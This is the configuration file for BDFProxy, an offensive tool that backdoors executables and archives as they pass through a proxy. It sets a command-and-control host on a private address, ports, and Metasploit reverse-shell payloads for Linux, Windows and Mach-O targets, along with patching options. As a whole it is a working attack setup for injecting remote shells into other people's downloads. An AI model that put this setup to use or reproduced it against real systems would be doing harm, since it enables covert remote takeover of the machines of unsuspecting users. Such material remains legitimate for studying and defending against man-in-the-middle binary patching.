"""
    BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'

    Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com

    Copyright (c) 2013-2014, Joshua Pitts
    All rights reserved.

    Redistribution and use in source and binary forms, with or without modification,
    are permitted provided that the following conditions are met:

        1. Redistributions of source code must retain the above copyright notice,
        this list of conditions and the following disclaimer.

        2. Redistributions in binary form must reproduce the above copyright notice,
        this list of conditions and the following disclaimer in the documentation
        and/or other materials provided with the distribution.

        3. Neither the name of the copyright holder nor the names of its contributors
        may be used to endorse or promote products derived from this software without
        specific prior written permission.

    THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
    AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
    IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
    ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
    LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
    CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
    SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
    INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
    CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
    ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
    POSSIBILITY OF SUCH DAMAGE.

    Tested on Kali-Linux.

"""

[ZIP]
# patchCount is the max number of files to patch in a zip file
# After the max is reached it will bypass the rest of the files 
# and send on it's way

patchCount = 5

# In Bytes
maxSize = 40000000

blacklist = .dll,  #don't do dlls in a zip file

[TAR]
# patchCount is the max number of files to patch in a tar file
# After the max is reached it will bypass the rest of the files
# and send on it's way

patchCount = 5

# In Bytes
maxSize = 40000000

blacklist = ,   # a comma is null do not leave blank

[targets]
	#MAKE SURE that your settings for host and port DO NOT
	# overlap between different types of payloads
	
	[[ALL]] # DEFAULT settings for all targets REQUIRED
	
	LinuxType = ALL 	# choices: x86/x64/ALL/None
	WindowsType = ALL 	# choices: x86/x64/ALL/None
	FatPriority = x64   # choices: x86 or x64
	
	FileSizeMax = 60000000  # ~60 MB (just under) No patching of files this large

	CompressedFiles = True #True/False
		[[[LinuxIntelx86]]]
		SHELL = reverse_shell_tcp   # This is the BDF syntax
		HOST = 192.168.1.168 		# The C2
		PORT = 8888
		SUPPLIED_SHELLCODE = None
		MSFPAYLOAD = linux/x86/shell_reverse_tcp	# MSF syntax
		
		[[[LinuxIntelx64]]]
		SHELL = reverse_shell_tcp
		HOST = 192.168.1.16
		PORT = 9999
		SUPPLIED_SHELLCODE = None
		MSFPAYLOAD = linux/x64/shell_reverse_tcp

		[[[WindowsIntelx86]]]
		PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
		HOST = 192.168.1.16
		PORT = 8443
		SHELL = reverse_shell_tcp 
		SUPPLIED_SHELLCODE = None
		ZERO_CERT = False
		PATCH_DLL = True
		MSFPAYLOAD = windows/shell_reverse_tcp

		[[[WindowsIntelx64]]]
		PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
		HOST = 192.168.1.16
		PORT = 8088
		SHELL = reverse_shell_tcp
		SUPPLIED_SHELLCODE = Nonepatchpatchpatch
		ZERO_CERT = True
		PATCH_DLL = False
		MSFPAYLOAD = windows/x64/shell_reverse_tcp

		[[[MachoIntelx86]]]
		SHELL = reverse_shell_tcp
		HOST = 192.168.1.16
		PORT = 4444
		SUPPLIED_SHELLCODE = None
		MSFPAYLOAD = linux/x64/shell_reverse_tcp

		[[[MachoIntelx64]]]
		SHELL = reverse_shell_tcp
		HOST = 192.168.1.16
		PORT = 5555
		SUPPLIED_SHELLCODE = None
		MSFPAYLOAD = linux/x64/shell_reverse_tcp